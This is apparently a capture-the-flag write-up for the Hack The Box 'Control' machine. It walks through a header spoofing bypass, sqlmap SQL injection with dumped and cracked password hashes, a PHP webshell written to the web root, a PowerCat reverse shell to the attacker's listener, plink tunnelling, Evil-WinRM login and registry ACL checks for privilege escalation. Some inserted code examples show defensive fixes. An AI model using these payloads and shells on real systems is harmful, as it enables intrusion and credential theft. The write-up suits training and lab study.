Header X-Forwarded-For value ==> "192.168.4.28"
As soon as I forwarded the request in Burp, I was able to access the admin panel (a product page).
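The bypass works because the application trusts a client-supplied header as proof that the request came through the proxy. As an added example (not part of the original write-up), the code below contrasts a reconstruction of that broken check with the correct one: only the TCP peer address can vouch for the proxy, and X-Forwarded-For is then read right-to-left past trusted hops to find the real client. The trusted-proxy list and function names are my own assumptions; the box's real code is not shown on the page.

```python
from ipaddress import ip_address, ip_network
from typing import Dict, Optional

# Assumed: the only proxy the application should believe is the internal
# host named in the page's HTML comment.
TRUSTED_PROXIES = [ip_network("192.168.4.28/32")]


def is_proxied_broken(headers: Dict[str, str]) -> bool:
    """Reconstruction (assumed) of the check behind 'Access Denied: Header
    Missing': whoever sends the header value is treated as proxied."""
    return headers.get("X-Forwarded-For", "").strip() == "192.168.4.28"


def _is_trusted(addr: str) -> bool:
    try:
        ip = ip_address(addr)
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_PROXIES)


def is_proxied_hardened(headers: Dict[str, str], remote_addr: str) -> bool:
    """Only the socket peer is authoritative; the header alone proves nothing.

    remote_addr is the address the TCP connection actually came from
    (REMOTE_ADDR in CGI terms), which a client cannot forge.
    """
    return _is_trusted(remote_addr)


def client_ip(headers: Dict[str, str], remote_addr: str) -> Optional[str]:
    """Resolve the real client: walk X-Forwarded-For from the right, skipping
    trusted proxies; the first untrusted hop is the client. Returns None on a
    malformed header rather than guessing."""
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops + [remote_addr]):
        try:
            ip = ip_address(hop)
        except ValueError:
            return None
        if not any(ip in net for net in TRUSTED_PROXIES):
            return str(ip)
    return remote_addr  # every hop is a trusted proxy: internal origin


if __name__ == "__main__":
    forged = {"X-Forwarded-For": "192.168.4.28"}  # direct request with spoofed header
    print("broken check :", is_proxied_broken(forged))
    print("hardened     :", is_proxied_hardened(forged, "10.10.14.21"))
    print("client       :", client_ip(forged, "10.10.14.21"))
```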


SQLi
So the next step was to find the SQLi in the product search. I used Burp to capture the search request so that I could exploit it with sqlmap.
The Info:
POST /search_products.php HTTP/1.1
Host: 10.10.10.167
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.167/admin.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
x-forwarded-for: 192.168.4.28
Connection: close
Upgrade-Insecure-Requests: 1
productName=D-Link+DWA-171

I saved the request as control.txt and ran sqlmap with this command: sqlmap --all -r control.txt --batch
root@kali~/htb/control/ sqlmap --all -r control.txt --batch
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.3.12.1#dev}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:14:03 /2019-12-07/
[14:14:03] [INFO] parsing HTTP request from 'control.txt'
[14:14:04] [INFO] testing connection to the target URL
[14:14:05] [INFO] testing if the target URL content is stable
[14:14:05] [INFO] target URL content is stable
[14:14:05] [INFO] testing if POST parameter 'productName' is dynamic
[14:14:05] [WARNING] POST parameter 'productName' does not appear to be dynamic
[14:14:05] [INFO] heuristic (basic) test shows that POST parameter 'productName' might be injectable (possible DBMS: 'MySQL')
[14:14:06] [INFO] heuristic (XSS) test shows that POST parameter 'productName' might be vulnerable to cross-site scripting (XSS) attacks
[14:14:06] [INFO] testing for SQL injection on POST parameter 'productName'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[14:14:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:14:08] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[14:14:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[14:14:17] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[14:14:18] [WARNING] reflective value(s) found and filtering out
[14:14:19] [INFO] POST parameter 'productName' appears to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable (with --string="36")
[14:14:19] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[14:14:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[14:14:19] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[14:14:19] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[14:14:19] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[14:14:20] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[14:14:20] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[14:14:20] [INFO] POST parameter 'productName' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[14:14:20] [INFO] testing 'MySQL inline queries'
[14:14:20] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[14:14:31] [INFO] POST parameter 'productName' appears to be 'MySQL >= 5.0.12 stacked queries (comment)' injectable
[14:14:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[14:14:41] [INFO] POST parameter 'productName' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[14:14:41] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:14:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[14:14:41] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[14:14:42] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[14:14:43] [INFO] target URL appears to have 6 columns in query
[14:14:43] [INFO] POST parameter 'productName' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[14:14:43] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'productName' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 86 HTTP(s) requests:
---
Parameter: productName (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: productName=-6916' OR 8776=8776#
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: productName=D-Link DWA-171' AND (SELECT 3579 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(3579=3579,1))),0x7176786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- EOXk
    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: productName=D-Link DWA-171';SELECT SLEEP(5)#
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: productName=D-Link DWA-171' AND (SELECT 8534 FROM (SELECT(SLEEP(5)))nDKy)-- xWso
    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: productName=D-Link DWA-171' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706b71,0x524d51445050564746647064625a4359716b4f4a7853434262624572596a424b5a65535962454f57,0x7176786b71),NULL,NULL#
---
[14:14:43] [INFO] the back-end DBMS is MySQL
[14:14:43] [INFO] fetching banner
web server operating system: Windows 10 or 2016
web application technology: Microsoft IIS 10.0, PHP 7.3.7
back-end DBMS: MySQL >= 5.0
banner: '10.4.8-MariaDB'
[14:14:44] [INFO] fetching current user
current user: 'manager@localhost'
[14:14:44] [INFO] fetching current database
current database: 'warehouse'
[14:14:44] [INFO] fetching server hostname
hostname: 'Fidelity'
[14:14:45] [INFO] testing if current user is DBA
[14:14:45] [INFO] fetching current user
current user is DBA: False
[14:14:45] [INFO] fetching database users
database management system users [6]:
[*] 'hector'@'localhost'
[*] 'manager'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'fidelity'
[*] 'root'@'localhost'
[14:14:45] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[14:14:46] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[14:14:46] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[14:14:46] [INFO] starting dictionary-based cracking (mysql_passwd)
[14:14:46] [INFO] starting 2 processes
[14:16:19] [INFO] cracked password 'l3tm3!n' for user 'manager'
database management system users password hashes:
[*] hector [1]:
    password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
[*] manager [1]:
    password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
    clear-text password: l3tm3!n
[*] root [1]:
    password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8
sqlmap successfully dumped the database users and got me what I was looking for: usernames and password hashes.
database management system users password hashes:
[*] hector [1]:
    password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
[*] manager [1]:
    password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
    clear-text password: l3tm3!n
[*] root [1]:
    password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8
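sqlmap's boolean and UNION payloads above work because productName is spliced into the SQL text. As an added example (not part of the original write-up), the snippet below rebuilds a six-column product search in SQLite, shows the concatenated query returning every row and the database banner for those payloads, and the bound-parameter version returning nothing for them. The table layout is constructed (the page only names the database `warehouse` and the column count), and MySQL's `#` comment is replaced by `--` because the demo runs on SQLite.

```python
import sqlite3
from typing import List, Tuple


def build_warehouse() -> sqlite3.Connection:
    """In-memory stand-in for 'warehouse' with a six-column product table
    (column count as sqlmap reported; names and rows are constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("""CREATE TABLE product (
        product_id INTEGER PRIMARY KEY, product_name TEXT, product_sku TEXT,
        product_price REAL, product_stock INTEGER, product_category TEXT)""")
    conn.executemany("INSERT INTO product VALUES (?,?,?,?,?,?)", [
        (1, "D-Link DWA-171", "DWA171", 24.99, 36, "wireless"),
        (2, "TP-Link Archer T2U", "T2U", 19.99, 12, "wireless"),
        (3, "Netgear GS308", "GS308", 29.99, 7, "switch"),
    ])
    return conn


def search_products_vulnerable(conn: sqlite3.Connection, name: str) -> List[Tuple]:
    """String concatenation (assumed to be what search_products.php does):
    the quote in the payload closes the literal and the rest is executed."""
    sql = f"SELECT * FROM product WHERE product_name LIKE '%{name}%'"
    return conn.execute(sql).fetchall()


def search_products_safe(conn: sqlite3.Connection, name: str) -> List[Tuple]:
    """Bound parameter: whatever the input contains, it is only a LIKE pattern."""
    sql = "SELECT * FROM product WHERE product_name LIKE ?"
    return conn.execute(sql, ("%" + name + "%",)).fetchall()


# sqlmap's boolean-based payload from the log above ('#' -> '--' for SQLite).
BOOLEAN_PAYLOAD = "-6916' OR 8776=8776 --"
# A UNION payload in the shape sqlmap used (6 columns), pulling the server
# banner into the fourth column the way the 'fetching banner' step does.
UNION_PAYLOAD = "zzz' UNION ALL SELECT NULL,NULL,NULL,sqlite_version(),NULL,NULL --"


def banner_via_union(conn: sqlite3.Connection) -> str:
    """What the UNION payload extracts through the vulnerable search."""
    rows = search_products_vulnerable(conn, UNION_PAYLOAD)
    return rows[0][3]


if __name__ == "__main__":
    db = build_warehouse()
    print("vulnerable, boolean payload:", len(search_products_vulnerable(db, BOOLEAN_PAYLOAD)), "rows")
    print("safe, boolean payload      :", len(search_products_safe(db, BOOLEAN_PAYLOAD)), "rows")
    print("vulnerable, UNION payload  :", banner_via_union(db))
    print("safe, normal search        :", search_products_safe(db, "DWA-171"))
```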
I can't do anything with the passwords I have: I can't log in to the system unless I upload a shell and get RCE through the SQLi. So I decided to use Burp again to send a PHP payload and create a reverse shell via the database. I found several RCE approaches, but used this one. I modified it a bit and my final payload looks like this:

It is easier to use:
root@kali:~/htb/control# cat s2.php <?php echo shell_exec($_GET["cmd"]); ?> root@kali:~/htb/control# sqlmap -r req --dbms mysql --file-write=s2.php --file-dest="C:/Inetpub/wwwroot/s2.php" ___ __H__ ___ ___[.]_____ ___ ___ {1.3.8#stable} |_ -| . [)] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 03:03:32 /2020-02-27/ [03:03:32] [INFO] parsing HTTP request from 'req' [03:03:32] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: productName (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: productName=-4687' OR 8277=8277# Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: productName=blah' AND (SELECT 1098 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(1098=1098,1))),0x717a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SQcG Type: stacked queries Title: MySQL > 5.0.11 stacked queries (comment) Payload: productName=blah';SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: productName=blah' AND (SELECT 7645 FROM (SELECT(SLEEP(5)))VIiw)-- ZBOf Type: UNION query Title: MySQL UNION query (NULL) - 6 columns Payload: productName=blah' UNION ALL SELECT NULL,CONCAT(0x716b6b7671,0x7474516e41764359637658616b4e77796557634a77594f6d7a4247674e4c5476696b6e4644446964,0x717a717171),NULL,NULL,NULL,NULL# --- [03:03:32] [INFO] testing MySQL [03:03:33] [INFO] confirming MySQL [03:03:33] [INFO] the back-end DBMS is MySQL web server operating system: Windows 10 or 2016 web application 
technology: Microsoft IIS 10.0, PHP 7.3.7 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [03:03:33] [INFO] fingerprinting the back-end DBMS operating system [03:03:33] [INFO] the back-end DBMS operating system is Windows [03:03:34] [WARNING] potential permission problems detected ('Access denied') [03:03:34] [WARNING] time-based comparison requires larger statistical model, please wait........................ (done) do you want confirmation that the local file 's2.php' has been successfully written on the back-end DBMS file system ('C:/Inetpub/wwwroot/s2.php')? [Y/n] y [03:03:46] [INFO] the local file 's2.php' and the remote file 'C:/Inetpub/wwwroot/s2.php' have the same size (41 B) [03:03:46] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167' [03:03:46] [WARNING] you haven't updated sqlmap for more than 208 days!!! [*] ending @ 03:03:46 /2020-02-27/ root@kali:~/htb/control#

POWERCAT REVERSE SHELL
Now I need a reverse connection from the Control machine. Since the machine is Windows, I went for a PowerShell reverse shell. After some reading and research, I decided to use PowerCat.
Setup:
- I downloaded powercat.ps1 to the working directory
- Set up the Python HTTP server: python -m SimpleHTTPServer 8081
- A netcat listener: nc -lvnp 8080
- And finally "call it from the website" to make it work (in very simple words).
The Activator:
ref: https://www.sherlocklee.top/2019/09/28/Reverse-Shell/
root@kali:~/htb# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.167 - - [27/Feb/2020 03:17:19] "GET /powercat.ps1 HTTP/1.1" 200 -
root@kali:~/htb/control# rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.10.167] 50670 Microsoft Windows [Version 10.0.17763.805] (c) 2018 Microsoft Corporation. All rights reserved. C:\inetpub\wwwroot>whoami whoami nt authority\iusr
C:\>cd users
cd users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is C05D-877F
Directory of C:\Users
11/05/2019 02:34 PM <DIR> .
11/05/2019 02:34 PM <DIR> ..
11/05/2019 02:34 PM <DIR> Administrator
11/01/2019 11:09 AM <DIR> Hector
10/21/2019 04:29 PM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 42,980,626,432 bytes free
C:\Users>cd Administrator
cd Administrator
Access is denied.
C:\Users>cd Hector
cd Hector
Access is denied.
I have access to the system; however, I'm not able to list the user directories. There are two users, Administrator and Hector, and access to both user directories is denied.
BUILDING THE TUNNEL: (THIS IS A FAILED STEP, PLEASE PROCEED TO THE "WHITE WINTER WOLF WEBSHELL" SECTION)
I fired up netstat -ano to see which ports are listening and which processes own them.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
|
C:\inetpub\wwwroot>netstat –ano
netstat –ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 792
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1904
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 456
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 332
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 948
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1784
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 592
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 584
TCP 10.10.10.167:80 10.10.14.21:35928 ESTABLISHED 4
TCP 10.10.10.167:49677 10.10.14.21:8080 ESTABLISHED 4632
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 792
TCP [::]:3306 [::]:0 LISTENING 1904
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 456
TCP [::]:49665 [::]:0 LISTENING 332
TCP [::]:49666 [::]:0 LISTENING 948
TCP [::]:49667 [::]:0 LISTENING 1784
TCP [::]:49668 [::]:0 LISTENING 592
TCP [::]:49669 [::]:0 LISTENING 584
UDP 0.0.0.0:123 *:* 1980
UDP 0.0.0.0:5353 *:* 1236
UDP 0.0.0.0:5355 *:* 1236
UDP 127.0.0.1:58934 *:* 948
UDP [::]:123 *:* 1980
UDP [::]:5353 *:* 1236
UDP [::]:5355 *:* 1236
C:\inetpub\wwwroot>
I found that the WinRM service is up and listening (TCP [::]:5985 [::]:0 LISTENING, PID 4). The service is only reachable locally, not from the outside, so the next step is to create a tunnel between my Kali machine and the Control machine. I will use the Windows PuTTY plink binary that ships with Kali to create the tunnel.
root@kali ~/htb/control locate plink.exe
/usr/share/windows-resources/binaries/plink.exe
root@ns09 ~/htb/control
Uploading PLink.exe
This turned out to be harder than expected. I tried the following, but got an error:
Set up the Python SMB server
root@kali ~/impacket/examples master ± python smbserver.py ROPNOP /usr/share/windows-resources/binaries/
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.167,49680)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.167,49680)
[*] Remaining connections []
[*] Incoming connection (10.10.10.167,49681)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.167,49681)
[*] Remaining connections []
Copy PLink.exe using Command Prompt:
C:\inetpub\wwwroot\uploads>dir
dir
Volume in drive C has no label.
Volume Serial Number is C05D-877F
Directory of C:\inetpub\wwwroot\uploads
12/07/2019 07:00 PM <DIR> .
12/07/2019 07:00 PM <DIR> ..
11/11/2019 12:59 PM 6 rev.php
11/11/2019 12:59 PM 6 rev2.php
11/11/2019 12:59 PM 6 shell.php
12/07/2019 07:00 PM <DIR> test
3 File(s) 18 bytes
3 Dir(s) 43,625,472,000 bytes free
C:\inetpub\wwwroot\uploads>copy \\10.10.14.21\ROPNOP\usr\share\windows-resources\binaries\plink.exe
copy \\10.10.14.21\ROPNOP\usr\share\windows-resources\binaries\plink.exe
You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
WHITEWINTERWOLF WEBSHELL
So my plan to copy PuTTY plink the "good boy" way failed so badly that I shut down my laptop and went to sleep. In my sleep the angels told me I could use WhiteWinterWolf's webshell to upload my PuTTY plink. Here is what I did:
- I copied the webshell PHP script into a file called "nshell.php"
- I reused the same saved request I had used to run SQLMap in my earlier step
- I created a new SQLMap query to copy the script into C:\inetpub\wwwroot\uploads\
My new SQLMAP script:
sqlmap -r control2.txt --file-write=/root/htb/control/nshell.php --file-dest=c:/inetpub/wwwroot/nshell.php
After running SQLMap, my new shell was uploaded successfully.
root@kali:~/htb/control# sqlmap -r control.txt --file-write=/root/htb/control/nshell.php --file-dest=c:/inetpub/wwwroot/nshell.php

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:29:32 /2020-02-27/

[03:29:32] [INFO] parsing HTTP request from 'control.txt'
Type: error-based
Type: stacked queries
Type: time-based blind
Type: UNION query

[*] ending @ 03:29:52 /2020-02-27/
As soon as SQLMap confirmed that my shell had been uploaded, I opened the shell in my browser:

I uploaded both nc.exe and PuTTY plink, to make sure at least one of them would give me a working connection.
I ran plink.exe first because I wanted to test whether it could help me. I know nc.exe works for sure, but I had not tried plink for tunneling yet. Let us try.

The tunnel was created successfully:
C:\inetpub\wwwroot\uploads>.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.11
FATAL ERROR: Network error: Connection refused
Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1 (2019-01-03) x86_64
The programs included with the Kali GNU/Linux system are free software;
Now I can run Evil-WinRM against the Control machine through the local end of the tunnel. However, I am still a low-privileged user, so I need to run Evil-WinRM as the user Hector. If you remember, my initial SQLMap scan revealed three users' password hashes:
hector : password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
manager : password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA clear-text password: l3tm3!n
root : password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8
SQLMap recovered the manager's password in clear text, but Hector's password was still unknown, so I used John to crack his hash: l33th4x0rhector
0e178792e8fc304a2e3133d535d38caf1da3cd9d:l33th4x0rhector
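To see why John gets through these hashes so quickly, here is a small PowerShell script that reproduces the mysql_native_password scheme they come from. It is an added example, not code from the original writeup: the stored value is just '*' followed by SHA1(SHA1(password)) in upper-case hex, with no salt and no work factor. The password/hash pairs it checks are the ones quoted on this page; the function names are mine and nothing else is assumed.

```powershell
# Added example, not code from the original writeup: reproduce the
# mysql_native_password scheme behind the hashes SQLMap dumped above.
# Stored value = '*' + SHA1(SHA1(password)) as upper-case hex; no salt,
# no work factor, so offline guessing runs at raw SHA-1 speed.

function Get-MySqlNativeHash {
    param([Parameter(Mandatory)][string]$Password)
    $sha1 = [System.Security.Cryptography.SHA1]::Create()
    try {
        $inner = $sha1.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($Password))
        # The second round hashes the raw 20 bytes, not their hex representation.
        $outer = $sha1.ComputeHash($inner)
    } finally {
        $sha1.Dispose()
    }
    '*' + (($outer | ForEach-Object { $_.ToString('X2') }) -join '')
}

function Test-MySqlNativePassword {
    param(
        [Parameter(Mandatory)][string]$Password,
        [Parameter(Mandatory)][string]$StoredHash
    )
    # Dumps and John output sometimes show the hash in lower case, so compare case-insensitively.
    (Get-MySqlNativeHash -Password $Password) -ieq $StoredHash
}

function Get-LegacyMySqlAccounts {
    # Given user => authentication_string pairs as they appear in a mysql.user dump,
    # report the accounts still on the 41-character '*...' mysql_native_password format.
    param([Parameter(Mandatory)][hashtable]$UserToHash)
    foreach ($entry in $UserToHash.GetEnumerator()) {
        if ($entry.Value -match '^\*[0-9A-Fa-f]{40}$') {
            [pscustomobject]@{ User = $entry.Key; Scheme = 'mysql_native_password (unsalted double SHA-1)' }
        }
    }
}

# Cross-check the two credentials recovered in the writeup against their stored hashes.
Test-MySqlNativePassword -Password 'l3tm3!n'         -StoredHash '*CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA'
Test-MySqlNativePassword -Password 'l33th4x0rhector' -StoredHash '*0E178792E8FC304A2E3133D535D38CAF1DA3CD9D'

# Which of the three dumped accounts would need migrating to a stronger plugin.
Get-LegacyMySqlAccounts -UserToHash @{
    hector  = '*0E178792E8FC304A2E3133D535D38CAF1DA3CD9D'
    manager = '*CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA'
    root    = '*0A4A5CAD344718DC418035A1F4D292BA603134D8'
}
```

Both Test-MySqlNativePassword calls should return True. On the defensive side, accounts on this scheme should be moved to caching_sha2_password (the MySQL 8 default), and it is worth remembering that the earlier sqlmap --file-write step only works when the application's database account holds the FILE privilege and secure_file_priv is unset; taking either away stops an injection from dropping a webshell into wwwroot regardless of how the passwords are hashed.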
Time to run Evil-WinRM as Hector (and grab user.txt):
root@kali:/opt/evil-winrm# ./evil-winrm.rb -i 127.0.0.1 -u hector -p 'l33th4x0rhector'

Info: Starting Evil-WinRM shell v1.6

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Hector\Documents> dir
*Evil-WinRM* PS C:\Users\Hector\Documents> cd ..
*Evil-WinRM* PS C:\Users\Hector> cd Desktop
*Evil-WinRM* PS C:\Users\Hector\Desktop> type user.txt
d8782dd01fb15b72c4b5ba77ef2d472b
*Evil-WinRM* PS C:\Users\Hector\Desktop>
GETTING ROOT
To get root, we need to escalate the privileges of our current user, Hector. This article and this article give a good overview of Windows privesc; I had to read several such articles to find the right way to become Administrator on the Control machine.
Let us see what our user Hector is capable of:
*Evil-WinRM* PS C:\Users\Hector\Desktop> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
———————————
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Who is in the Administrators group?
*Evil-WinRM* PS C:\Users\Hector\Desktop> net localgroup Administrators
net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
———————————————————————————————————————–
Administrator
The command completed successfully.
*Evil-WinRM* PS C:\Users\Hector\Desktop>

*Evil-WinRM* PS C:\Users\Hector\Desktop> cmdkey /list
cmdkey /list
Currently stored credentials:
* NONE *
*Evil-WinRM* PS C:\Users\Hector\Desktop>
So cmdkey /list did not reveal any stored credentials on the box either. It was getting a bit hard for me at this stage.
Checking Windows ACLs (Access Control Lists) is one of the most important post-exploitation steps: it shows what the compromised user is allowed to modify, and therefore how that user can help with privesc. I concentrated on the service keys under the System's CurrentControlSet to see what rights our user Hector has there. The command is: get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "Hector Users Path"
The command returned a huge list of ACL entries for user Hector:
*Evil-WinRM* PS C:\Users\Hector\Desktop> get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "Hector Users Path"
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "Hector Users Path"
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Data
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Data
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking 4.0.0.0
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking 4.0.0.0
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
